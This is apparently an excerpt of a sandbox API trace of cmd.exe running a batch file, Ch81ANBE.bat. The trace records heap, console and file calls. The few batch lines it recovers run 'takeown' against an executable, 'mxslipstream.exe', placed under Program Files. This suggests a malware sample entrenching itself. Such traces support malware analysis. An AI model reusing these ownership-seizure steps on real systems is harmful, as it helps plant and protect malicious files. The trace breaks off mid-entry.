hHeap=0x390000, dwFlags=0x0, lpMem=0x3a81a8 | out: hHeap=0x390000) returned 1 [0221.301] GetEnvironmentStringsW () returned 0x3a5fc0* [0221.301] GetProcessHeap () returned 0x390000 [0221.301] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb5c) returned 0x3a81a8 [0221.301] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0221.301] GetProcessHeap () returned 0x390000 [0221.301] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390db8 | out: hHeap=0x390000) returned 1 [0221.301] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ee9a8 | out: lpAttributeList=0x2ee9a8) [0221.301] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.301] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0221.301] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.301] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0221.302] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.302] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0221.302] SetConsoleInputExeNameW () returned 0x1 [0221.302] GetConsoleOutputCP () returned 0x1b5 [0221.303] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0221.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.303] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0221.304] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0221.304] _get_osfhandle (_FileHandle=3) returned 0x74 [0221.304] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0221.304] GetProcessHeap () returned 0x390000 [0221.304] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4b60 | out: hHeap=0x390000) returned 1 [0221.304] GetProcessHeap () returned 0x390000 [0221.304] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4a30 | out: hHeap=0x390000) returned 1 [0221.304] GetProcessHeap () returned 0x390000 [0221.304] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4908 | out: hHeap=0x390000) returned 1 [0221.304] GetProcessHeap () returned 0x390000 [0221.304] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a48a0 | out: hHeap=0x390000) returned 1 [0221.304] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a47c8 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a45b0 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4530 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4400 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a42d8 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4270 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41a0 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391230 | out: hHeap=0x390000) returned 1 [0221.305] GetProcessHeap () returned 0x390000 [0221.305] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3911d0 | out: hHeap=0x390000) returned 1 [0221.305] _get_osfhandle (_FileHandle=3) returned 0x74 [0221.305] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0221.305] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0xc2, lpOverlapped=0x0) returned 1 [0221.306] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0221.306] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0221.306] _get_osfhandle (_FileHandle=3) returned 0x74 [0221.306] GetFileType (hFile=0x74) returned 0x1 [0221.307] _get_osfhandle (_FileHandle=3) returned 0x74 [0221.307] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0221.307] GetProcessHeap () returned 0x390000 [0221.307] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0221.307] GetProcessHeap () returned 0x390000 [0221.307] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0221.310] _tell (_FileHandle=3) returned 47 [0221.310] _close (_FileHandle=3) returned 0 [0221.310] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eef7c | out: _Buffer="\r\n") returned 2 [0221.310] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.310] GetFileType (hFile=0x7) returned 0x2 [0221.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef3c | out: lpMode=0x2eef3c) returned 1 [0221.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.311] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eef68, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eef68*=0x2) returned 1 [0221.313] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0221.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.313] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eef78 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0221.314] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eef78 | out: _Buffer=">") returned 1 [0221.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.314] GetFileType (hFile=0x7) returned 0x2 [0221.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.314] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef40 | out: lpMode=0x2eef40) returned 1 [0221.314] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.315] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eef6c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eef6c*=0x26) returned 1 [0221.315] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.315] GetFileType (hFile=0x7) returned 0x2 [0221.316] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.316] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1c4 | out: lpMode=0x2ef1c4) returned 1 [0221.316] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.316] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x391238*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2ef1f0, lpReserved=0x0 | out: lpBuffer=0x391238*, lpNumberOfCharsWritten=0x2ef1f0*=0x7) returned 1 [0221.317] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1fc | out: _Buffer=" /F \"C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe\" ") returned 65 [0221.317] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.317] GetFileType (hFile=0x7) returned 0x2 [0221.317] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.317] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1bc | out: lpMode=0x2ef1bc) returned 1 [0221.318] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.318] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x41, lpNumberOfCharsWritten=0x2ef1e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef1e8*=0x41) returned 1 [0221.320] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2ef21c | out: _Buffer="\r\n") returned 2 [0221.320] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.320] GetFileType (hFile=0x7) returned 0x2 [0221.320] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0221.320] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1dc | out: lpMode=0x2ef1dc) returned 1 [0221.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0221.321] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ef208, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2ef208*=0x2) returned 1 [0221.323] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0221.323] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0221.323] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0221.323] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0221.323] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0221.323] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0221.323] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0221.323] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0221.323] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0221.323] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0221.323] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0221.323] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0221.323] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0221.323] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0221.323] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0221.323] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0221.323] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0221.323] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0221.323] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0221.324] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0221.324] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0221.324] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0221.324] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0221.324] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0221.324] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0221.324] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0221.324] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0221.324] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0221.324] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0221.324] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0221.324] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0221.324] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0221.324] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0221.324] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0221.324] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0221.324] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0221.324] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0221.325] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0221.325] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0221.325] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0221.325] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0221.325] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0221.326] GetConsoleTitleW (in: lpConsoleTitle=0x2eed8c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.326] GetConsoleTitleW (in: lpConsoleTitle=0x2eeb20, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.327] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ee9a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eea70 | out: lpAttributeList=0x2ee9a8, lpSize=0x2eea70) returned 1 [0221.327] UpdateProcThreadAttribute (in: lpAttributeList=0x2ee9a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eea68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ee9a8, lpPreviousValue=0x0) returned 1 [0221.327] GetStartupInfoW (in: lpStartupInfo=0x2ee964 | out: lpStartupInfo=0x2ee964*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0221.346] CloseHandle (hObject=0x74) returned 1 [0221.346] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0221.346] GetProcessHeap () returned 0x390000 [0221.346] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a81a8 | out: hHeap=0x390000) returned 1 [0221.347] GetEnvironmentStringsW () returned 0x3a5fc0* [0221.347] GetProcessHeap () returned 0x390000 [0221.347] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb5c) returned 0x3a81a8 [0221.347] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0221.347] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0224.785] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ee944 | out: lpExitCode=0x2ee944*=0x0) returned 1 [0224.785] CloseHandle (hObject=0x78) returned 1 [0224.785] _vsnwprintf (in: _Buffer=0x2eea8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ee950 | out: _Buffer="00000000") returned 8 [0224.785] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0224.785] GetProcessHeap () returned 0x390000 [0224.785] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a81a8 | out: hHeap=0x390000) returned 1 [0224.785] GetEnvironmentStringsW () returned 0x3a5fc0* [0224.786] GetProcessHeap () returned 0x390000 [0224.786] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb5c) returned 0x3a81a8 [0224.786] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0224.786] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0224.786] GetProcessHeap () returned 0x390000 [0224.786] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a81a8 | out: hHeap=0x390000) returned 1 [0224.786] GetEnvironmentStringsW () returned 0x3a5fc0* [0224.786] GetProcessHeap () returned 0x390000 [0224.786] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xb5c) returned 0x3a81a8 [0224.786] FreeEnvironmentStringsW (penv=0x3a5fc0) returned 1 [0224.786] GetProcessHeap () returned 0x390000 [0224.786] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x390db8 | out: hHeap=0x390000) returned 1 [0224.786] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ee9a8 | out: lpAttributeList=0x2ee9a8) [0224.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.786] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.786] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.786] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0224.787] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.787] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0224.787] SetConsoleInputExeNameW () returned 0x1 [0224.787] GetConsoleOutputCP () returned 0x1b5 [0224.787] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0224.787] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ef1c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0224.788] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0224.788] _get_osfhandle (_FileHandle=3) returned 0x78 [0224.788] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4a98 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4968 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4840 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4d08 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4798 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4580 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4500 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a43d0 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a42a8 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a4238 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a41a0 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x391230 | out: hHeap=0x390000) returned 1 [0224.789] GetProcessHeap () returned 0x390000 [0224.789] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3911d0 | out: hHeap=0x390000) returned 1 [0224.789] _get_osfhandle (_FileHandle=3) returned 0x78 [0224.789] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0224.789] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2ef1a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2ef1a8*=0xb3, lpOverlapped=0x0) returned 1 [0224.790] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0224.790] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0224.791] _get_osfhandle (_FileHandle=3) returned 0x78 [0224.791] GetFileType (hFile=0x78) returned 0x1 [0224.791] _get_osfhandle (_FileHandle=3) returned 0x78 [0224.791] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0224.791] GetProcessHeap () returned 0x390000 [0224.791] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x400a) returned 0x3b4bc8 [0224.792] GetProcessHeap () returned 0x390000 [0224.792] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x80) returned 0x3911d0 [0224.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", nBufferLength=0x208, lpBuffer=0x2ee938, lpFilePart=0x2ee930 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", lpFilePart=0x2ee930*="mxslipstream.exe") returned 0x3a [0224.792] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x391258 [0224.792] FindClose (in: hFindFile=0x391258 | out: hFindFile=0x391258) returned 1 [0224.792] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0224.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe28fefe0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe28fefe0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 0x391258 [0224.792] FindClose (in: hFindFile=0x391258 | out: hFindFile=0x391258) returned 1 [0224.792] _wcsnicmp (_String1="WIBFE5~1", _String2="Windows Portable Devices", _MaxCount=0x18) returned -12 [0224.792] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\mxslipstream.exe", lpFindFileData=0x2ee64c | out: lpFindFileData=0x2ee64c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fb67cb0, ftCreationTime.dwHighDateTime=0x1d5615d, ftLastAccessTime.dwLowDateTime=0xd8392270, ftLastAccessTime.dwHighDateTime=0x1d5ac28, ftLastWriteTime.dwLowDateTime=0xd8392270, ftLastWriteTime.dwHighDateTime=0x1d5ac28, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mxslipstream.exe", cAlternateFileName="MXSLIP~1.EXE")) returned 0x391258 [0224.793] FindClose (in: hFindFile=0x391258 | out: hFindFile=0x391258) returned 1 [0224.793] _wcsnicmp (_String1="MXSLIP~1.EXE", _String2="mxslipstream.exe", _MaxCount=0x10) returned 11 [0224.793] GetProcessHeap () returned 0x390000 [0224.793] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x2a) returned 0x391258 [0224.793] GetProcessHeap () returned 0x390000 [0224.793] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3b4bc8 | out: hHeap=0x390000) returned 1 [0224.795] _tell (_FileHandle=3) returned 63 [0224.795] _close (_FileHandle=3) returned 0 [0224.795] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2eef7c | out: _Buffer="\r\n") returned 2 [0224.795] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.795] GetFileType (hFile=0x7) returned 0x2 [0224.796] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.796] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef3c | out: lpMode=0x2eef3c) returned 1 [0224.796] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.796] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2eef68, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2eef68*=0x2) returned 1 [0226.011] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0226.011] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0226.011] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2eef78 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0226.011] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2eef78 | out: _Buffer=">") returned 1 [0226.011] _get_osfhandle (_FileHandle=1) returned 0x7 [0226.011] GetFileType (hFile=0x7) returned 0x2 [0228.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eef40 | out: lpMode=0x2eef40) returned 1 [0228.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2eef6c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2eef6c*=0x26) returned 1 [0228.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.016] GetFileType (hFile=0x7) returned 0x2 [0228.017] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0228.017] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef1c4 | out: lpMode=0x2ef1c4) returned 1 [0228.017] _get_osfhandle (_FileHandle=1) returned 0x7 [0228.017] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x390dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2ef1f0, lpReserved=0x0 | out: lpBuffer=0x390dc0*, lpNumberOfCharsWritten=0x2ef1f0*=0x3) returned 1 [0228.018] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2ef1fc | out: _Buffer=" FN=\"mxslipstream.exe\" ") returned 23 [0228.018] 